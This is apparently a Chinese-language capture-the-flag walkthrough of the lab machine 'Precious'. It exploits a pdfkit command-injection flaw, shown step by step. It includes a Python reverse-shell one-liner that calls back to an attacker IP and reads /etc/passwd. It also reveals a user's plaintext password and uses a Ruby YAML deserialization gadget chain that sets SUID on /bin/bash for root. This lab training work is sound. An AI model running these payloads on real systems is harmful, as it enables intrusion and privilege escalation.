信息收集
端口扫描
nmap -sV --min-rate 1000 -p- 10.10.11.189PORT STATE SERVICE VERSION22/tcp open tcpwrapped80/tcp open tcpwrapped
漏洞探测
进入web端口.发现存在一个ssrf. 本地起一个web服务。可以探测到发送的什么类型请求. 可以看到生成了一个pdf文件
将该pdf下载下来,可以看到使用的是pdfkit v0.8.6。 CVE-2022-25765 这个没见过。通过谷歌可以知道这里可以执行命令.
我们构造payload
构造反弹shell(感觉python3这个反弹shell有点子小无敌)
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.33",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
提权
提权准备
cat /etc/passswdwhoamisudo -luname -abash-5.1$ ls ../ -altotal 16drwxr-xr-x 4 root root 4096 Oct 26 08:28 .drwxr-xr-x 12 root root 4096 Oct 26 08:28 ..drwxr-xr-x 2 root root 4096 Oct 26 08:28 htmldrwxr-xr-x 6 root root 4096 Oct 26 08:28 pdfappbash-5.1$ ls ../../ -altotal 48drwxr-xr-x 12 root root 4096 Oct 26 08:28 .drwxr-xr-x 18 root root 4096 Nov 21 15:11 ..drwxr-xr-x 2 root root 4096 Feb 8 01:24 backupsdrwxr-xr-x 9 root root 4096 Oct 26 08:28 cachedrwxr-xr-x 25 root root 4096 Oct 26 08:28 libdrwxrwsr-x 2 root staff 4096 Oct 26 08:28 locallrwxrwxrwx 1 root root 9 Sep 26 04:27 lock -> /run/lockdrwxr-xr-x 10 root root 4096 Feb 8 01:06 logdrwxrwsr-x 2 root mail 4096 Oct 26 08:28 maildrwxr-xr-x 2 root root 4096 Oct 26 08:28 optlrwxrwxrwx 1 root root 4 Sep 26 04:27 run -> /rundrwxr-xr-x 4 root root 4096 Oct 26 08:28 spooldrwxrwxrwt 3 root root 4096 Feb 8 03:48 tmpdrwxr-xr-x 4 root root 4096 Oct 26 08:28 wwwbash-5.1$ ls / -altotal 68drwxr-xr-x 18 root root 4096 Nov 21 15:11 .drwxr-xr-x 18 root root 4096 Nov 21 15:11 ..lrwxrwxrwx 1 root root 7 Sep 26 04:26 bin -> usr/bindrwxr-xr-x 3 root root 4096 Nov 21 15:11 bootdrwxr-xr-x 17 root root 3100 Feb 8 01:06 devdrwxr-xr-x 79 root root 4096 Feb 8 01:06 etcdrwxr-xr-x 4 root root 4096 Oct 26 08:28 homelrwxrwxrwx 1 root root 31 Nov 21 15:07 initrd.img -> boot/initrd.img-5.10.0-19-amd64lrwxrwxrwx 1 root root 31 Nov 21 15:11 initrd.img.old -> boot/initrd.img-5.10.0-19-amd64lrwxrwxrwx 1 root root 7 Sep 26 04:26 lib -> usr/liblrwxrwxrwx 1 root root 9 Sep 26 04:26 lib64 -> usr/lib64lrwxrwxrwx 1 root root 10 Sep 26 04:26 libx32 -> usr/libx32drwx------ 2 root root 16384 Sep 26 04:26 lost+founddrwxr-xr-x 3 root root 4096 Oct 26 08:28 mediadrwxr-xr-x 2 root root 4096 Oct 26 08:28 mntdrwxr-xr-x 3 root root 4096 Oct 26 08:28 optdr-xr-xr-x 276 root root 0 Feb 8 01:06 procdrwx------ 4 root root 4096 Nov 21 15:32 rootdrwxr-xr-x 18 root root 580 Feb 8 05:52 runlrwxrwxrwx 1 root root 8 Sep 26 04:26 sbin -> usr/sbindrwxr-xr-x 2 root root 4096 Oct 26 08:28 srvdr-xr-xr-x 13 root root 0 Feb 8 01:06 sysdrwxrwxrwt 11 root root 4096 Feb 8 05:38 tmpdrwxr-xr-x 14 root root 4096 Sep 26 04:27 usrdrwxr-xr-x 12 root root 4096 Oct 26 08:28 varlrwxrwxrwx 1 root root 28 Nov 21 15:07 vmlinuz -> boot/vmlinuz-5.10.0-19-amd64lrwxrwxrwx 1 root root 28 Nov 21 15:11 vmlinuz.old -> boot/vmlinuz-5.10.0-19-amd64bash-5.1$ whoamirubybash-5.1$ sudo -lWe trust you have received the usual lecture from the local SystemAdministrator. It usually boils down to these three things:#1) Respect the privacy of others.#2) Think before you type.#3) With great power comes great responsibility.bash-5.1$ cat /etc/passwdroot:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologinlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologingnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologinnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin_apt:x:100:65534::/nonexistent:/usr/sbin/nologinsystemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologinsystemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologinmessagebus:x:103:109::/nonexistent:/usr/sbin/nologinsshd:x:104:65534::/run/sshd:/usr/sbin/nologinhenry:x:1000:1000:henry,,,:/home/henry:/bin/bashsystemd-timesync:x:999:999:systemd Time Synchronization:/:/usr/sbin/nologinsystemd-coredump:x:998:998:systemd Core Dumper:/:/usr/sbin/nologinruby:x:1001:1001::/home/ruby:/bin/bash_laurel:x:997:997::/var/log/laurel:/bin/false
henry:Q3c1AqGHtoI0aXAYFH这里拿到了henry的shell 可以直接登陆,然后拿到了第一个flag
bash-5.1$ cd /home/henrycd /home/henrybash-5.1$ lslsdependencies.yml user.txtbash-5.1$ cat user.txtcat user.txt956fc17eb3f5286ede3663a47c52c78d
YAML反序列化攻击提权 对于henry用户,我们继续信息收集一波.发现可以root执行以下脚本.
bash-5.1$ sudo -lsudo -lMatching Defaults entries for henry on precious:env_reset, mail_badpass,secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binUser henry may run the following commands on precious:(root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb
看一下这个文件
bash-5.1$ cat /opt/update*cat /opt/update*# Compare installed dependencies with those specified in "dependencies.yml"require "yaml"require 'rubygems'# TODO: update versions automaticallydef update_gems()enddef list_from_fileYAML.load(File.read("dependencies.yml"))enddef list_local_gemsGem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}endgems_file = list_from_filegems_local = list_local_gemsgems_file.each do |file_name, file_version|gems_local.each do |local_name, local_version|if(file_name == local_name)if(file_version != local_version)puts "Installed version differs from the one specified in file: " + local_nameelseputs "Installed version is equals to the one specified in file: " + local_nameendendendend
这里的YAML.load是存在一个反序列化漏洞的. 直接学习如何利用就行了. 这里触发反序列化的漏洞点在于加载这个dependencies.yml 根据下面这个exp,这里的git_set就是执行命令的地方. 这里vi很难用,所以我直接把这个dependencies.yml删了,重新下载一个构建好的进去.
- !ruby/object:Gem::Installeri: x- !ruby/object:Gem::SpecFetcheri: y- !ruby/object:Gem::Requirementrequirements:!ruby/object:Gem::Package::TarReaderio: &1 !ruby/object:Net::BufferedIOio: &1 !ruby/object:Gem::Package::TarReader::Entryread: 0header: "abc"debug_output: &1 !ruby/object:Net::WriteAdaptersocket: &1 !ruby/object:Gem::RequestSetsets: !ruby/object:Net::WriteAdaptersocket: !ruby/module 'Kernel'method_id: :systemgit_set: "chmod +s /bin/bash"method_id: :resolve
对git_set进行修改,以root权限为/bin/bash 赋权. 先执行该脚本
bash-5.1$sudo /usr/bin/ruby /opt/update_dependencies.rb然后以henry执行/bin/bash
bash-5.1$ /bin/bash -pbash-5.1# iduid=1000(henry) gid=1000(henry) euid=0(root) egid=0(root) groups=0(root),1000(henry)bash-5.1# ls /rootroot.txtbash-5.1# cat /root/root.txtafb23e8fd8363fa26529425f286c74e1
总结+知识补充
本靶机首先在pdf敏感处发现了一个pdfkit的CVE漏洞.
1.通过该漏洞实现了命令注入,随后获得了一个初级的webshell.2.随后在初级的webshell的情况下,信息收集到了另一个账户henry.3.登陆上henry后,发现henry能以root执行一个文件.4.对该文件进行分析,发现该文件调用了一个dependencies.yml5.对dependencies.yml进行分析,在该文件存在一个YAML.load的反序列化漏洞6.该反序列化漏洞可以做到RCE,通过RCE我们为/bin/bash赋权了root-7.最后调用/bin/bash 即可获得root权限
chmod的相关参数 chmod 是一个赋权操作 常用命令: chmod +x <文件名> 为文件添加可执行的权限
chmod 777 <文件名> 为文件添加可读可写可执行权限
chmod +s <文件名> 在文件执行时把进程的属主或组ID置为该文件的文件属主。(比如我以root执行该命令,那么该文件将会以后的读取者将视作root)
原文始发于微信公众号(靶机狂魔):靶机-Precious
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论